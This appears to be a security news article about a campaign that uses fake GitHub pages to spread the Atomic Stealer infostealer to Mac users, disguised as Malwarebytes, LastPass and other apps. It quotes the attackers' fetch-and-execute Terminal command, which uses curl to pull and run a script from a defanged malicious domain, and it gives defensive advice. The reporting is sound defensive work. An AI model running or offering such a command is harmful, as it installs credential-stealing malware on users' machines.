GitHub Hosts Malware from Malwarebytes, LastPass, Citibank, SentinelOne, and More

A large-scale campaign targeting Mac users is leveraging fake GitHub pages to distribute information-stealing malware disguised as popular legitimate applications.

Among the impersonated software are Malwarebytes for Mac, LastPass, Citibank, SentinelOne, and scores of other well-known brands.

Although brand impersonation is nothing new, this campaign demonstrates the evolving tactics cybercriminals employ to entice users into installing harmful code themselves.

Threat researchers from LastPass Threat Intelligence and Malwarebytes have identified numerous GitHub pages purporting to host macOS installers for trusted applications.

In several instances, attackers purchase sponsored Google ads that direct users to these malicious pages instead of official vendor sites.

In other cases, the campaign relies on SEO-poisoning techniques to boost the fake repositories in search results for queries such as “Malwarebytes GitHub macOS.” Once lured to the site, unwitting users are presented with a “GET [APPLICATION]” button.

Clicking it leads to instructions that download and execute an installer script from a newly registered domain, often without any user prompt or code review, effectively bypassing macOS protections and user vigilance.

The goal of this operation is to deploy the Atomic Stealer (also known as AMOS), a powerful macOS information stealer that harvests browser data, clipboard contents, and stored credentials.

If someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.

Both Malwarebytes for Mac and ThreatDown flag and block this variant, yet the initial social engineering remains shockingly effective against less cautious users.

Technical Breakdown of the Infection Chain

The installation process relies entirely on a single-line shell command that users are instructed to copy and paste into their macOS Terminal:

bash/bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"

Here’s how it works:

1. The curl -fsSL options silently download a remote script, following any redirects and failing quietly on HTTP errors.
2. Wrapping the curl invocation in $(…) causes the downloaded script to be passed directly to the outer bash -c command.
3. The outer shell invocation runs the fetched script instantly, without presenting its contents to the user for review.

Attackers have even encoded intermediate URLs in base64 to obfuscate the true destination, making detection by casual observers more difficult.

Because the Terminal approach does not trigger macOS’s built-in application signing checks or require admin-level prompts, the script executes with the user’s privileges and can install persistent agents in LaunchAgents or LaunchDaemons.

Best Practices to Avoid Fake Software

To protect against this and similar tactics, Mac users should adopt the following guidelines:

Never execute copy-pasted commands from unverified web pages, forums, or GitHub repositories. Commands invoking curl … | bash or similar constructions should be treated as high risk.

Always download applications from the developer’s official website or a reputable app store. If in doubt, verify download URLs with the vendor directly via their support channels.

Disable or exercise caution with sponsored search results. These ads can redirect to malicious pages masquerading as trusted brands.

Employ real-time antimalware protection that includes web filtering. Solutions like Malwarebytes for Mac and ThreatDown detect and block Atomic Stealer variants before installation.

If an infection is suspected, inspect the ~/Library/LaunchAgents and /Library/LaunchDaemons folders for unfamiliar items and remove any suspicious entries.

For comprehensive remediation, consider a full macOS reinstall and restore files only from known clean backups. Reinitialize all account passwords and enable multi-factor authentication to prevent unauthorized access with stolen credentials.

Although GitHub is generally a trusted platform for open-source software, this campaign illustrates how adversaries can weaponize it by impersonating legitimate brands.

Vigilance, cautious download practices, and robust endpoint protection remain the best defenses against such rapidly evolving threats.

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.